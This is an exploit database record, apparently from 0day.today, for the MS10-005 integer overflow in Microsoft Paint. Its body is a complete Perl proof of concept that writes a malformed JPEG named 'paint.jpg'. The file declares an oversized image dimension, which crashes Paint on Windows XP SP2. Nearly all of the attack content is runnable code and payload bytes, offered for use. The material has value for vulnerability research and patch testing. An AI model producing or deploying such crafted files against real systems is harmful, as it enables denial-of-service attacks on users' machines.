Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005

{"type": "zdt", "lastseen": "2016-04-19T23:58:25", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005", "published": "2010-05-06T00:00:00", "href": "http://0day.today/exploit/description/12146", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for windows platform in category dos / poc", "hash": "b60ab8c88a94ca04f247e27947f0dd2a60a14a93dba8182c36e628ba12d02c99", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "=============================================================\r\nMicrosoft Paint Integer Overflow Vulnerability (DoS) MS10-005\r\n=============================================================\r\n\r\n# Date: 2010-05-04\r\n# Version: 5.1.2600.2180\r\n# Tested on: Windows XP SP2\r\n \r\n \r\n#!/usr/bin/perl\r\n \r\n$PoC =\r\n\"\\xFF\\xD8\\xFF\\xE0\\x00\\x10\\x4A\\x46\\x49\\x46\\x00\\x01\\x01\\x01\\x00\\x60\".\r\n\"\\x00\\x60\\x00\\x00\\xFF\\xE1\\x00\\x16\\x45\\x78\\x69\\x66\\x00\\x00\\x49\\x49\".\r\n\"\\x2A\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xDB\\x00\\x43\".\r\n\"\\x00\\x08\\x06\\x06\\x07\\x06\\x05\\x08\\x07\\x07\\x07\\x09\\x09\\x08\\x0A\\x0C\".\r\n\"\\x14\\x0D\\x0C\\x0B\\x0B\\x0C\\x19\\x12\\x13\\x0F\\x14\\x1D\\x1A\\x1F\\x1E\\x1D\".\r\n\"\\x1A\\x1C\\x1C\\x20\\x24\\x2E\\x27\\x20\\x22\\x2C\\x23\\x1C\\x1C\\x28\\x37\\x29\".\r\n\"\\x2C\\x30\\x31\\x34\\x34\\x34\\x1F\\x27\\x39\\x3D\\x38\\x32\\x3C\\x2E\\x33\\x34\".\r\n\"\\x32\\xFF\\xDB\\x00\\x43\\x01\\x09\\x09\\x09\\x0C\\x0B\\x0C\\x18\\x0D\\x0D\\x18\".\r\n\"\\x32\\x21\\x1C\\x21\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\".\r\n\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\".\r\n\"\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\\x32\".\r\n\"\\x32\\x32\\x32\\x32\\x32\\x32\\xFF\\xC0\\x00\\x11\\x08\".\r\n \r\n\"\\x93\\xCE\\x93\\xCE\". #Image Size 37838x37838 (Integer Overflow)\r\n \r\n\"\\x03\".\r\n\"\\x01\\x22\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\xFF\\xC4\\x00\\x1F\\x00\\x00\\x01\".\r\n\"\\x05\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\".\r\n\"\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\xFF\\xC4\\x00\\xB5\\x10\\x00\".\r\n\"\\x02\\x01\\x03\\x03\\x02\\x04\\x03\\x05\\x05\\x04\\x04\\x00\\x00\\x01\\x7D\\x01\".\r\n\"\\x02\\x03\\x00\\x04\\x11\\x05\\x12\\x21\\x31\\x41\\x06\\x13\\x51\\x61\\x07\\x22\".\r\n\"\\x71\\x14\\x32\\x81\\x91\\xA1\\x08\\x23\\x42\\xB1\\xC1\\x15\\x52\\xD1\\xF0\\x24\".\r\n\"\\x33\\x62\\x72\\x82\\x09\\x0A\\x16\\x17\\x18\\x19\\x1A\\x25\\x26\\x27\\x28\\x29\".\r\n\"\\x2A\\x34\\x35\\x36\\x37\\x38\\x39\\x3A\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\".\r\n\"\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5A\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6A\".\r\n\"\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7A\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\".\r\n\"\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\\xA8\".\r\n\"\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\\xB6\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\\xC5\\xC6\".\r\n\"\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\\xE1\\xE2\\xE3\".\r\n\"\\xE4\\xE5\\xE6\\xE7\\xE8\\xE9\\xEA\\xF1\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\\xF8\\xF9\".\r\n\"\\xFA\\xFF\\xC4\\x00\\x1F\\x01\\x00\\x03\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\".\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\".\r\n\"\\x0A\\x0B\\xFF\\xC4\\x00\\xB5\\x11\\x00\\x02\\x01\\x02\\x04\\x04\\x03\\x04\\x07\".\r\n\"\\x05\\x04\\x04\\x00\\x01\\x02\\x77\\x00\\x01\\x02\\x03\\x11\\x04\\x05\\x21\\x31\".\r\n\"\\x06\\x12\\x41\\x51\\x07\\x61\\x71\\x13\\x22\\x32\\x81\\x08\\x14\\x42\\x91\\xA1\".\r\n\"\\xB1\\xC1\\x09\\x23\\x33\\x52\\xF0\\x15\\x62\\x72\\xD1\\x0A\\x16\\x24\\x34\\xE1\".\r\n\"\\x25\\xF1\\x17\\x18\\x19\\x1A\\x26\\x27\\x28\\x29\\x2A\\x35\\x36\\x37\\x38\\x39\".\r\n\"\\x3A\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\\x53\\x54\\x55\\x56\\x57\\x58\\x59\".\r\n\"\\x5A\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6A\\x73\\x74\\x75\\x76\\x77\\x78\\x79\".\r\n\"\\x7A\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8A\\x92\\x93\\x94\\x95\\x96\\x97\".\r\n\"\\x98\\x99\\x9A\\xA2\\xA3\\xA4\\xA5\\xA6\\xA7\\xA8\\xA9\\xAA\\xB2\\xB3\\xB4\\xB5\".\r\n\"\\xB6\\xB7\\xB8\\xB9\\xBA\\xC2\\xC3\\xC4\\xC5\\xC6\\xC7\\xC8\\xC9\\xCA\\xD2\\xD3\".\r\n\"\\xD4\\xD5\\xD6\\xD7\\xD8\\xD9\\xDA\\xE2\\xE3\\xE4\\xE5\\xE6\\xE7\\xE8\\xE9\\xEA\".\r\n\"\\xF2\\xF3\\xF4\\xF5\\xF6\\xF7\\xF8\\xF9\\xFA\\xFF\\xDA\\x00\\x0C\\x03\\x01\\x00\".\r\n\"\\x02\\x11\\x03\\x11\\x00\\x3F\\x00\\xF7\\xFA\\x28\\xA2\\x80\\x0A\\x28\\xA2\\x80\".\r\n\"\\x0A\\x28\\xA2\\x80\\x0A\\x28\\xA2\\x80\\x3F\\xFF\\xD9\";\r\n \r\nopen(file , \">\", \"paint.jpg\"); \r\n \r\nprint file $PoC; \r\n \r\nclose(file); \r\n\r\n\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-12146", "sourceHref": "http://0day.today/exploit/12146", "modified": "2010-05-06T00:00:00", "reporter": "unsign", "viewCount": 1, "enchantments": {"vulnersScore": 10.0}}